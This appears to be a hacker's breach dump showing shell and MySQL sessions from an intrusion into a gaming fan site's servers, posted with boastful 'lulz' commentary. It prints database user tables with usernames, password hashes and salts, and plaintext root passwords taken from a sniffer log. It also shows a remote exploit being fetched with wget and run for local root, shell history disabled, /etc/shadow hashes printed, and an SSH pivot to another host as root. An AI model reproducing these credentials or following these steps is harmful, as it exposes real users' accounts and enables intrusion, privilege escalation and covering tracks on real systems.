drwx------  2 mysql mysql       4096 Jun 18  2008 zenit
[root@web01 bulat]# cd /var/www/html
[root@web01 html]# ls -la
total 711004
drwxr-xr-x 20 root      root        4096 Oct 11 07:45 .
drwxr-xr-x 21 root      root        4096 Jun 28 09:06 ..
drwxrwxr-x 13 root      apache      4096 Sep 24 16:25 adds
-rw-rw-r--  1 eira      eira         499 Dec 20  2003 back.JPG
-rw-r--r--  1 root      root       14427 Aug 31  2007 cal2.html
-rw-r--r--  1 root      root       14427 Aug 31  2007 cal.html
drwxr-xr-x  3 eira      eira        4096 Jan 16  2007 common
drwxr-xr-x  3 eira      eira        4096 Feb  8  2005 daoc
drwxr-xr-x  4 eira      eira        4096 Jul 10  2008 eira
drwxr-xr-x  7 eira      eira        4096 Aug 19  2008 error_404
-rw-r--r--  1 eira      eira        2274 Dec 21  2003 favicon.ico
drwxr-xr-x  3 root      root        4096 Aug 20  2008 gladiatus
-rw-r--r--  1 root      root           0 Dec 25  2006 google13ce76cda5634bd5.html
drwxr-xr-x  4 eira      eira        4096 Jan 30  2006 img
-rw-rw-r--  1 eira      eira        1507 Jun 22  2004 index.html
-rw-r--r--  1 root      root    14553577 Oct 11 07:51 phpbb_users.txt
-rw-r--r--  1 root      root          16 Mar 25  2005 phpinfo_x.php
-rw-r--r--  1 root      root           0 Sep 21  2007 robots.txt
-rw-r--r--  1 root      root        1548 Jan 16  2007 robots.txt-old
drwxrwxr-x 13 eira      apache      4096 Oct  3  2010 rsc
drwxrwxr-x 31 eira      apache      4096 Oct  7 00:59 runescape
drwxr-xr-x  9 root      root        4096 Sep 24  2007 silks
-rw-rw-r--  1 eira      eira       15698 Dec 20  2003 Silverion.jpg
-rw-r--r--  1 root      root      141686 Jun  6  2007 sitemap2.xml
-rw-r--r--  1 root      root       15276 Jun  6  2007 sitemap.xml
drwxr-xr-x  2 root      root        4096 Mar 28  2005 stats
-rw-rw-r--  1 eira      eira       34462 Jun 22  2004 tipitlayout1c.jpg
drwxr-xr-x  2 webalizer root        4096 Jul  1  2005 usage
drwxr-xr-x  5 eira      eira        4096 Sep 26 06:27 vela
-rw-r--r--  1 root      root   114052870 Jun 24 01:41 vela.tar.gz
drwxr-xr-x  3 eira      eira        4096 Aug  9  2007 vocegiuliana
drwxr-xr-x  2 eira      eira        4096 Aug  9  2007 volantini
drwxr-xr-x  3 eira      eira        4096 Jun  9  2008 wizard
-rw-r--r--  1 root      root         127 Jan 15  2007 y_key_56098cca870c821d.html
drwxr-xr-x  2 root      root        4096 Jun 24 09:34 zenit
drwxr-xr-x 10 eira      eira        4096 Jun 24 01:08 zenit-with-holes
-rw-r--r--  1 root      root   598370689 Jun 24 01:44 zenit.zip
[root@web01 html]# cd adds
[root@web01 adds]# ls -al
total 208
drwxrwxr-x 13 root  apache  4096 Sep 24 16:25 .
drwxr-xr-x 20 root  root    4096 Oct 11 07:45 ..
-rw-rw-r--  1 root  apache  2308 Apr 29  2006 activation.old.php
-rw-rw-r--  1 peter peter   2846 Sep 14  2008 activation.php
drwxrwxr-x  2 root  apache  4096 Apr 17 21:03 areas
drwxrwxr-x  2 root  apache  4096 Jun 15  2008 backup
-rw-rw-r--  1 root  apache   580 Apr 25  2006 backup.php
-rw-rw-r--  1 root  apache  1002 Jan  4  2007 comparereqs.php
-rw-rw-r--  1 peter peter  15124 Jul 21  2008 contactsubmits.php
-rw-rw-r--  1 peter peter    473 Jul 21  2008 contactuspopup.php
-rw-rw-r--  1 peter peter    961 Jul 23  2008 download.php
drwxrwxrwx  6 root  apache  4096 Dec 20  2009 files
drwxrwxr-x  3 root  apache  4096 Oct  3  2010 functions
drwxrwxr-x  2 root  apache  4096 Jun 15  2008 handlers
-rw-rw-r--  1 peter peter    421 Sep 14  2008 hosttest.php
drwxrwxr-x  2 root  apache  4096 Sep 14  2008 includes
-rw-rw-r--  1 root  apache 25247 May 20 14:34 index.php
-rw-rw-r--  1 root  apache   130 Sep 24 16:50 info.php
-rw-rw-r--  1 peter peter  12110 Jun 12 14:59 itempopup_search.php
drwxrwxr-x  4 peter peter   4096 Jun 12 14:58 js
-rw-rw-r--  1 root  apache   397 Apr 25  2006 keepalive.php
-rw-rw-r--  1 root  apache  4454 Apr 28  2006 login.old.php
-rw-rw-r--  1 peter peter  10348 Jan 26  2011 login.php
drwxrwxr-x  8 root  apache  4096 Jun 15  2008 map_team
-rw-rw-r--  1 root  apache  2270 May 30  2006 previewtimes.php
drwxrwxr-x  5 root  apache  4096 Apr  2  2011 styles
drwxrwxr-x  2 root  apache  4096 Jun 15  2008 tmp
drwxrwxr-x  2 root  apache  4096 Sep 24 16:50 transfer
-rw-rw-r--  1 root  apache   533 Apr 25  2006 userguide_coders.php
-rw-rw-r--  1 root  apache 28370 Jul 16  2009 userguide.php
-rw-rw-r--  1 root  apache  4889 Apr 25  2006 userguidepopup.php
[root@web01 adds]# head -n010 login.php

*------------------------------------------------------------------------------
*/

session_start();
[root@web01 adds]# head -n100 login.php

*------------------------------------------------------------------------------
*/

session_start();

//include stuff
include('functions/db_connect_guides.php');
require_once('functions/admin.php');
ini_set('error_reporting', E_ALL);

function prepareinput($array)
{
  foreach($array as $key => $value)
  {
    if (!is_array($array[$key]))
    {
      $value = stripslashes($value);
   $value = mysql_real_escape_string($value);
   $array[$key] = $value;
    }
  }
  return $array;
}

prepareinput($_POST);
function login($msg, $disable, $user)
 {
  $disabled = '';
  if($disable == 'true')
     {
        $disabled = ' disabled';
     }
  print '








  


    

   


        

          


      
Restricted Area :: '.$msg.'
    

            
Username
            

          

            
Password
            

          

      
Remember you?
      

     
    

      

            

          



  

';
 }

if(!isset($_SESSION['count']))
 {
  $_SESSION['count'] = 0;
 }

if ($_SESSION['count'] > 3)
 {
  login('Too many incorrect logins', 'true');
  exit();
 }

if(isset($_GET['logout']))
 {
  if(isset($_COOKIE['session_info']) || isset($_COOKIE['session_info_id']))
        {
          setcookie("session_info", "", time()-60*60*24*100, "/");
          setcookie("session_info_id", "", time()-60*60*24*100, "/");
        }
        if(isset($_SESSION['session_info']))
          {
[root@web01 adds]# cat functions/db_connect_guides.php
[root@web01 adds]# cd ..
[root@web01 html]# ls -al
total 716824
drwxr-xr-x 20 root      root        4096 Oct 11 07:45 .
drwxr-xr-x 21 root      root        4096 Jun 28 09:06 ..
drwxrwxr-x 13 root      apache      4096 Oct 11 07:53 adds
-rw-rw-r--  1 eira      eira         499 Dec 20  2003 back.JPG
-rw-r--r--  1 root      root       14427 Aug 31  2007 cal2.html
-rw-r--r--  1 root      root       14427 Aug 31  2007 cal.html
drwxr-xr-x  3 eira      eira        4096 Jan 16  2007 common
drwxr-xr-x  3 eira      eira        4096 Feb  8  2005 daoc
drwxr-xr-x  4 eira      eira        4096 Jul 10  2008 eira
drwxr-xr-x  7 eira      eira        4096 Aug 19  2008 error_404
-rw-r--r--  1 eira      eira        2274 Dec 21  2003 favicon.ico
drwxr-xr-x  3 root      root        4096 Aug 20  2008 gladiatus
-rw-r--r--  1 root      root           0 Dec 25  2006 google13ce76cda5634bd5.html
drwxr-xr-x  4 eira      eira        4096 Jan 30  2006 img
-rw-rw-r--  1 eira      eira        1507 Jun 22  2004 index.html
-rw-r--r--  1 root      root    20509161 Oct 11 07:54 phpbb_users.txt
-rw-r--r--  1 root      root          16 Mar 25  2005 phpinfo_x.php
-rw-r--r--  1 root      root           0 Sep 21  2007 robots.txt
-rw-r--r--  1 root      root        1548 Jan 16  2007 robots.txt-old
drwxrwxr-x 13 eira      apache      4096 Oct  3  2010 rsc
drwxrwxr-x 31 eira      apache      4096 Oct  7 00:59 runescape
drwxr-xr-x  9 root      root        4096 Sep 24  2007 silks
-rw-rw-r--  1 eira      eira       15698 Dec 20  2003 Silverion.jpg
-rw-r--r--  1 root      root      141686 Jun  6  2007 sitemap2.xml
-rw-r--r--  1 root      root       15276 Jun  6  2007 sitemap.xml
drwxr-xr-x  2 root      root        4096 Mar 28  2005 stats
-rw-rw-r--  1 eira      eira       34462 Jun 22  2004 tipitlayout1c.jpg
drwxr-xr-x  2 webalizer root        4096 Jul  1  2005 usage
drwxr-xr-x  5 eira      eira        4096 Sep 26 06:27 vela
-rw-r--r--  1 root      root   114052870 Jun 24 01:41 vela.tar.gz
drwxr-xr-x  3 eira      eira        4096 Aug  9  2007 vocegiuliana
drwxr-xr-x  2 eira      eira        4096 Aug  9  2007 volantini
drwxr-xr-x  3 eira      eira        4096 Jun  9  2008 wizard
-rw-r--r--  1 root      root         127 Jan 15  2007 y_key_56098cca870c821d.html
drwxr-xr-x  2 root      root        4096 Jun 24 09:34 zenit
drwxr-xr-x 10 eira      eira        4096 Jun 24 01:08 zenit-with-holes
-rw-r--r--  1 root      root   598370689 Jun 24 01:44 zenit.zip
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| lotro              |
| runescape          |
| war                |
+--------------------+
4 rows in set (0.00 sec)

mysql> show tables;
+---------------------------+
| Tables_in_runescape       |
+---------------------------+
| adds_approvals            |
| adds_auth                 |
| adds_categories           |
| adds_images               |
| adds_ip                   |
| adds_log                  |
| adds_sessions             |
| adds_uploads              |
| adds_users                |
| members                   |
| rs2_atlas                 |
| rs2_calculators           |
| rs2_calculators_arrays    |
| rs2_citadel               |
| rs2_citadel_slot          |
| rs2_clanlist              |
| rs2_clans_news            |
| rs2_clans_pages           |
| rs2_construction          |
| rs2_contactus             |
| rs2_diversion_locations   |
| rs2_diversion_pair        |
| rs2_diversion_week        |
| rs2_dynamic_approve       |
| rs2_dynamic_bans          |
| rs2_dynamic_log           |
| rs2_dynamic_statcache     |
| rs2_events                |
| rs2_events_comments       |
| rs2_events_scores         |
| rs2_events_scores_players |
| rs2_events_scores_year    |
| rs2_events_teams          |
| rs2_featured              |
| rs2_gecache               |
| rs2_genames               |
| rs2_gerecords             |
| rs2_getimes               |
| rs2_guides                |
| rs2_hitscheck             |
| rs2_microhelper           |
| rs2_monster               |
| rs2_monster_attacks       |
| rs2_monster_groups        |
| rs2_monster_items         |
| rs2_monster_reports       |
| rs2_news                  |
| rs2_pages                 |
| rs2_poll                  |
| rs2_poll2                 |
| rs2_poll2_answers         |
| rs2_poll2_votes           |
| rs2_poll_results          |
| rs2_poll_votes            |
| rs2_quest                 |
| rs2_quest_draft           |
| rs2_quest_pages           |
| rs2_quest_reports         |
| rs2_quest_req             |
| rs2_races                 |
| rs2_report_ban            |
| rs2_report_flood          |
| rs2_subquests             |
| rs2_summon                |
| rs2_times                 |
| rs2_times_dategroups      |
| rs2item                   |
| rs2item_categories        |
| rs2item_group_items       |
| rs2item_groups            |
| rs2item_reports           |
| rs2item_stats             |
| rs2item_subcat            |
| rs2shops                  |
| rs2shops_city             |
| rs2shops_currency         |
| rs2shops_kingdom          |
| rs2shops_report           |
| rs2shops_reportstock      |
| rs2shops_stock            |
| rs2shops_type             |
| rsc_bestiary              |
| staff_position            |
| staff_users               |
+---------------------------+
84 rows in set (0.00 sec)


mysql> select concat_ws(0x3a,user_name,password,salt) from adds_users;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    11415326
Current database: runescape
+----------------------------------------------------------+
| concat_ws(0x3a,user_name,password,salt)                  |
+----------------------------------------------------------+
| Silverion:reset:1f8a04f00                                |
| SerpentEye:17da56625f34972c22f117899a5d0b15:7505d9618    |
| pokemama:88d5ef7cb02d4505d4f8e65ec597fbd6:a2d14e70e      |
| Neminon:e471395f84f7a7a35d246f9f7160ad72:                |
| boomer12342:f29f9860bda0f8b859dd23268ecc7297:8dfcee96f   |
| Vhellcat:c701886bf870bcdc805f76b5fd374dc7:08bf200db      |
| TecMaster532:cd06d27dd29ccbd6e07696da9c60b723:3cfea708e  |
| tripsis:61e375455c3098a8eb025509b0c01ce2:a6540538c       |
| Siobhana:9cba134889178fab200681778ed64bc7:07aa5e9a6      |
| Cowman_Alt:64e77b28db2690a3f634f2b0bf6cfcd4:a5f45f4ff    |
| Jafje:ff34beeb4b3ca02f56c0220f55cff497:d877c37b1         |
| BloodAngel:d98a9d8f98897615a6d9d7564e5ff96a:270972c7e    |
| Speedyshel:f84faf4a6559b31970a5a9011d23834a:cc18e9930    |
| Octarine19:7c36cce68f9638084e1a9e59bcc35049:bd4fbd2b5    |
| ForsakenMage:ada76cc2ab885d5f7279e80922d7a71d:e45a31d57  |
| RussetAlpha:b487ad58bbf037f95e71233e715a5dad:53a7ec27a   |
| Cruiser:a5dfbc4b586c7c4cafa22f2ad0ee5b96:1d553218b       |
| odd:f8ff8c31ba125143553ec938e5b12d20:61ca14d4a           |
| Peter:951089f4243b3d8a6f3594c93044e760:3e53bd8f5         |
| Howlin0001:68330b7b8312607a2bfe8c9c19871b91:35dea8edb    |
| Cowman_133:299aaa335c3a495bbf3d1cafd058f5cd:9675427ce    |
| Wyvren2000:705388e025c0a735fc1da8db7e712c2b:6c073222b    |
| Omnitec:reset:3ec004ab3                                  |
| Neglexis:2ebad4e50ce6f35a8475dbee4e56eb96:e38cd9ef9      |
| All Bogs:9654c5c25c0c8ef1a388a72752838789:7a8173c33      |
| SupaDavis:ef62d3d94a47a37b7da6fddc57f8ad8c:b709c0781     |
| Warriormonkx:8a062a10beaba882dcd3df5e8c7bee02:dcf7f7c69  |
| Y_Guy:7acbe93c2fe874ce0ed3ae41e08f3459:4a223174a         |
| Wisse:a193694d7c0b81fef013981c9b4e6f28:ef42c869d         |
| Quyneax:bac515af1da4bfaaad2784252d486437:072df5de1       |
| Georgelemmons:a62aa37c706d7b771248c482a5967f1d:0ddb6568e |
| Racheya:016ae44475e45249916f8b95dd86d01c:2f88b1ecb       |
| thiesje:cdcfdc5b16348885ea7463faf28b9bf5:8c6fa1bd7       |
| Rien_Adelric:0d8151822c4c0969a0055301c162221b:8fd0c8e29  |
| Mil:e7a650a25af5937e73c7f49a229a6f6b:51fde375f           |
| Xena_Dragon:934151f9705764bf2210525929df0d71:b3cc89564   |
| Salleh:2ea800dd6342b4c5c1b0c8feaed1d9b9:ba42b9413        |
| Dudecrush8:9a97271a9fbc5cdc946f92baa8ee34e8:6cb5adb7e    |
| Shelby_Polo:2f58410c5ed973d69b4ba033616788ba:426bc7a2c   |
| Rainy_Day:303096af8ea595fd0107324785ab25b8:b2dc94661     |
| Aurhora:9592eda4def55c8039a05b5ed3c774f9:66cdecae4       |
| qloque:846239db337c953829c787f0942c170e:254287237        |
| RobocopIsWin:e4866132c88592ece4ac96ef18df5aa9:346f55d94  |
| Alaz:538c7ae1ad111f526333891211e1a4c0:8d22758d6          |
| Woofumz:63472704bdf216b612a2da024726958a:af48fb8b4       |
| jimmy_jim:reset:415d8a35d                                |
| Evaluate:a95f91b0f1aa28dd4407885c6ed41bf1:9f3e31d31      |
+----------------------------------------------------------+

And now...just for lulz, we sniffed da root passwordz
[root@web01 bulat]# cat /root/.bdlogs
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: root:WBSCt92b
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: root:WBSCt92b
login in: root:WBSCt92b
login at: 208.43.229.199 bulat:
login at: 208.43.229.199 bulat:
^That makes one box, NOW FOR DA NEXT!@#$#$%^&&**((@(@(@))))@)@)@)@)#)#)#)#)#)#)##)#)#)#)#)#)#)#)#)#0


[bulat@forumx ~]$
[bulat@forumx ~]$ wget niqqaz.rs/0dayhidden -O tr1p >> /dev/null
[bulat@forumx ~]$ ./tr1p
Enter b1tch key: ***************
[+] Tr1p/SSDTX local root exploit by g4yh1tl3r
[+] Resolved commit_creds to ffffffff81062417
[+] Resolved prepare_kernel_cred to ffffffff810622f8
[+] Us1ng 1dt b1tch br34k
[+] Preparing underflow payload
[+] Mapped ZERO PAGE!
[root@forumx ~]# export HISTFILE=/dev/null
[root@forumx ~]# uname -a; id
Linux forumx.tip.it 2.6.30.10-105.2.23.fc11.x86_64 #1 SMP Thu Feb 11 07:06:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@forumx ~]# last -a |less
root     tty1         Tue Oct 11 07:42    gone - no logout
reboot   system boot  Tue Oct 11 07:23          (00:45)     2.6.30.10-105.2.23.fc11.x86_64
peter    pts/0        Tue Oct 11 05:23 - down   (01:56)     stu8fa4.kent.ac.uk
reboot   system boot  Mon Oct 10 09:42          (21:37)     2.6.30.10-105.2.23.fc11.x86_64
peter    pts/1        Sun Oct  9 18:57 - 19:21  (00:24)     stu8fa4.kent.ac.uk
root     pts/1        Mon Oct  3 10:38 - 11:27  (00:48)     188-230-152-15.dynamic.t-2.net
peter    pts/2        Sun Oct  2 08:04 - 09:15  (01:11)     cpc4-hart9-2-0-cust61.11-3.cable.virginmedia.com
root     pts/1        Sun Oct  2 08:04 - 00:46  (16:42)     188-230-152-15.dynamic.t-2.net
root     pts/1        Fri Sep 30 01:24 - 08:24  (06:59)     bsn-176-196-23.dial-up.dsl.siol.net
peter    pts/1        Thu Sep 29 07:29 - 08:53  (01:23)     cpc4-hart9-2-0-cust61.11-3.cable.virginmedia.com
root     pts/1        Tue Sep 27 02:23 - 04:31  (02:07)     188-230-152-15.dynamic.t-2.net
root     pts/2        Mon Sep 26 15:07 - 22:06  (06:59)     188-230-152-15.dynamic.t-2.net
peter    pts/1        Mon Sep 26 14:27 - 16:33  (02:05)     cpc4-hart9-2-0-cust61.11-3.cable.virginmedia.com
[root@forumx ~]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
avahi:x:499:498:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
backuppc:x:497:496::/var/lib/BackupPC:/usr/bin/nologin
torrent:x:496:495:BitTorrent Seed/Tracker:/var/lib/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
bulat:x:500:500::/home/bulat:/bin/bash
lighttpd:x:495:490:lighttpd web server:/var/www/lighttpd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
avahi-autoipd:x:494:489:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
peter:x:501:48::/home/peter:/bin/bash
teamspeak:x:502:502::/home/teamspeak:/bin/bash
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
unbound:x:493:488:Unbound DNS resolver:/etc/unbound:/sbin/nologin
pulse:x:492:487:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
sphinx:x:491:484:Sphinx Search:/var/lib/sphinx:/bin/bash
clamav:x:490:483:Clamav database update user:/var/lib/clamav:/sbin/nologin
[root@forumx ~]# cat /etc/shadow
root:$1$YrhwGJ9V$KQHuSZO40Bp0svjl/KxoY0:15258:0:99999:7:::
bin:*:14115:0:99999:7:::
daemon:*:14115:0:99999:7:::
adm:*:14115:0:99999:7:::
lp:*:14115:0:99999:7:::
sync:*:14115:0:99999:7:::
shutdown:*:14115:0:99999:7:::
halt:*:14115:0:99999:7:::
mail:*:14115:0:99999:7:::
news:*:14115:0:99999:7:::
uucp:*:14115:0:99999:7:::
operator:*:14115:0:99999:7:::
games:*:14115:0:99999:7:::
gopher:*:14115:0:99999:7:::
ftp:*:14115:0:99999:7:::
nobody:*:14115:0:99999:7:::
nscd:!!:14115:0:99999:7:::
vcsa:!!:14115:0:99999:7:::
distcache:!!:14115:0:99999:7:::
tcpdump:!!:14115:0:99999:7:::
rpm:!!:14115:0:99999:7:::
ntp:!!:14115:0:99999:7:::
squid:!!:14115:0:99999:7:::
dbus:!!:14115:0:99999:7:::
polkituser:!!:14115:0:99999:7:::
apache:!!:14115:0:99999:7:::
avahi:!!:14115:0:99999:7:::
openvpn:!!:14115:0:99999:7:::
named:!!:14115:0:99999:7:::
rpcuser:!!:14115:0:99999:7:::
nfsnobody:!!:14115:0:99999:7:::
mailnull:!!:14115:0:99999:7:::
smmsp:!!:14115:0:99999:7:::
sshd:!!:14115:0:99999:7:::
webalizer:!!:14115:0:99999:7:::
dovecot:!!:14115:0:99999:7:::
backuppc:!!:14115:0:99999:7:::
torrent:!!:14115:0:99999:7:::
haldaemon:!!:14115:0:99999:7:::
mysql:!!:14116::::::
xfs:!!:14119::::::
bulat:$1$ZgjnuDTq$zwXg5PW4oa5ZK5ETOyIMp0:14119:0:99999:7:::
lighttpd:!!:14142::::::
postfix:!!:14142::::::
avahi-autoipd:!!:14154::::::
peter:$1$8DGBPy.f$57BMYWsBl4VyMnwnJqKKV0:15196:0:99999:7:::
teamspeak:$1$yb1s1A.E$KrNgLaB9qTZvI5Sv8kgnr/:14230:0:99999:7:::
rpc:!!:14722:0:99999:7:::
oprofile:!!:14722::::::
unbound:!!:14817::::::
pulse:!!:14817::::::
sphinx:!!:14817::::::
clamav:!!:15149::::::
[root@forumx html]# ls -al
total 36
drwxr-xr-x.  5 root  root   4096 2010-08-18 15:20 .
drwxr-xr-x.  9 root  root   4096 2010-04-06 17:31 ..
drwxr-xr-x  15 peter apache 4096 2011-10-11 06:07 forum.tip.it
-rw-r--r--   1 root  root    202 2008-07-12 20:50 index.html
-rw-r--r--   1 root  root    746 2008-06-05 13:51 index.html.bak
drwxr-xr-x  11 root  root   4096 2008-06-14 10:39 lotro.tip.it
drwxrwxrwx  12 root  root   4096 2008-06-14 10:39 nosf.tip.it
[root@forumx html]# cd forum.tip.it
[root@forumx forum.tip.it]# cat conf_global.php

Some more lulz-
mysql> select concat_ws(0x3a,members_l_username,members_pass_hash,members_pass_salt,email_full) from members limit 0,100;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    8246
Current database: forum2009

+-----------------------------------------------------------------------------------+
| concat_ws(0x3a,members_l_username,members_pass_hash,members_pass_salt,email_full) |
+-----------------------------------------------------------------------------------+
| ipstech:811743d8d526fc93ebccc21868b5dc01:p2juR:0                                  |
| raenond:a51db4af185443c9eda7959bbc1db46b:|Xx@^                                    |
| newptor:7dbe3455cbe75ccaf323f0fdc60c343c::1                                       |
| forsakenmage:b16c211fd7ece57d27a26a6b3af2dc6f::0                                  |
| ma6bi0ahk:5da6d54b3a62471dca4b9149fffea480:2RfQJ                                  |
| grornemow:e8ae9223c7e9d10732696e944f170339:r&rxP                                  |
| stephenpope95:de999ecfb8bd7a324a21c14c17eafc40:y>;{N                              |
| snowstorm:a4d4a28ac7555cc63dabf97a4a6bf859:&#}7C                                  |
| pyro::                                                                            |
| greatsilverwyrm:ec3cce8f7202359d5736747033764d31:                                 |
| tsai::                                                                            |
| ladysarafina::                                                                    |
| lightning:816480113af7100424d2f25a362c559d:bU^Oi                                  |
| exarch::                                                                          |
| mage_burner:f79b3d203951b862c4b8b6da4abfcac2:O#8ZG                                |
| ks_jeppe::                                                                        |
| sunli:c49b237e7c06fc7dcb9f74e535329289::0                                         |
| eeeeediot:623289da6a24f789119314ea84468a5c:y*+y1                                  |
| nathaninch:c9768daf5bf630888a1b8089467ccfdc::0                                    |
| fat_slug:a6c56934e826c1a4e024e7fb8792a2fc:?o70?:0                                 |
| swamp_cat::                                                                       |
| deadman_andy::                                                                    |
| spencerm98::                                                                      |
| tomato:8efa60748b553eef472ae9f2c18c559a:                                          |
| swifty_mcvae::                                                                    |
| the_sith:41cbdb3a5812fbb4bbea15fdbe860783:                                        |
| misplacedme:5ccd22ceef73abf706205231926b99ad:idmSP:0                              |
| red_tanya:481b5be84b6fdf41209287e5b4ecbd9f:>7kSW:0                                |
| ryl::                                                                             |
| meesy::                                                                           |
| grin_king::                                                                       |
| runegirlie:725f06fee6d8ae7a16907dba70f7970a:                                      |
| wistan::                                                                          |
| weezcake:6dbc57cc53dfd9a55169d2a3e45cf2df:                                        |
| dusqi:853606dbc6d91e2d9c3150d18c7d3d7b:                                           |
| silverion:86038e207109d75b5d4ca3fed3f77515:N!}v;:0                                |
| troydosdos:26adab7d89084975f19f4726feba94df:Lg4/O                                 |
| leon_art:8401deaafc1e650873141fb288148e8c:Zyauw                                   |
| wmathewphelpsr:0c7f31c983ff159a2df84f8b18653099:.SvI}                             |
| thunder::                                                                         |
| bobdabuilda::                                                                     |
| sunspeak:15da5ede7bd58b954d20ff3fa5a8c00e:M*T;`                                   |
| rease:5a23d8c8d72eb409b676224e478c3fc8:h.UBm                                      |
| militaris:109bff6a3dd1ca020dfa8403a156c709:44.%z                                  |
| cameron::                                                                         |
| swtkittn:dbd1975e4055c1cd36e0e1acae1928c8:                                        |
| centuramage::                                                                     |
| zidanect:3ea3599bff9d19a9fea14a750d82555a::0                                      |
| chicken::                                                                         |
| insane:34aa5866c803ab64fc2b43ff7897a402:                                          |
| dromaruk::                                                                        |
| usara:72fc5241b75e9ee7a1dabd793cebf3fd:z|Ybh                                      |
| gumby::                                                                           |
| herr::                                                                            |
| lageris89::                                                                       |
| mideea::                                                                          |
| cruiser:59fec7c72e4b9b14446101618d06cb10:                                         |
| leylen:577fa11e45922b41b2e67c373b1a9047:                                          |
| rpg_pro:62de274e1926c5640fed496626d3cf81:R/Un#                                    |
| sidewinder::                                                                      |
| tomiz::                                                                           |
| punk4ever::                                                                       |
| jammy316::                                                                        |
| sandytrain::                                                                      |
| netbent::                                                                         |
| cellkiller20:11d74d43fbca17192a3b18cb56c0ea66:[zEE'                               |
| craven_image:1f99956e517d2bdb9edd2ab95ba1d666:u(-LT                               |
| emp::                                                                             |
| lord9000::                                                                        |
| kylepetty::                                                                       |
| smoressoccer:a01d93f665bf6cb96dd7c2a907a08f42:                                    |
| paul::                                                                            |
| mystical25::                                                                      |
| phunk::                                                                           |
| andrew::                                                                          |
| the_pure12::                                                                      |
| 2cansamyboy::                                                                     |
| pepsi16::                                                                         |
| godofend::                                                                        |
| coolhaz7000::                                                                     |
| bluetear:2b3ffba93ff4ff5bf913d3cd32dc1a8d:                                        |
| phil:18d40b67a951ffd2111600af162e4204:                                            |
| sneakydiva::                                                                      |
| xxxxthugxxxx::                                                                    |
| lord::                                                                            |
| annie::                                                                           |
| pker_dude_jr:49362d81bd5318dacf86ea4f0477f9f1:                                    |
| juha_itse::                                                                       |
| matt::                                                                            |
| nik::                                                                             |
| blue107:a5085415200c7ef8da98b59e4834b819:                                         |
| greenminer:1d9704bfc517f297a06e2cb62102a3cb:                                      |
| ex1le::                                                                           |
| gathra:526a36f262203f006b73913bdec4ef1f:|jJIm                                     |
| moridin:599e4766740f874be5076cca7b9215d8:ybg`l                                    |
| _kinslayer_::                                                                     |
| psycho::                                                                          |
| ultrasmasher:f7e0a2681c4f46f649ff00e37d3d14dd:                                    |
| sin_q::                                                                           |
| anonimouse69::                                                                    |
+-----------------------------------------------------------------------------------+
100 rows in set (0.13 sec)


--NEXT BOX

[root@forumx bulat]# ssh gaspez-arts.com -lroot
The authenticity of host 'gaspez-arts.com (66.36.248.197)' can't be established.
RSA key fingerprint is 58:7c:8e:2b:1c:80:41:ad:15:65:98:72:31:3a:48:8e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'gaspez-arts.com,66.36.248.197' (RSA) to the list of known hosts.
root@gaspez-arts.com's password:
Last login: Fri Sep 30 13:33:04 2011 from 188-230-152-15.dynamic.t-2.net
[root@mail ~]# uname -a;id
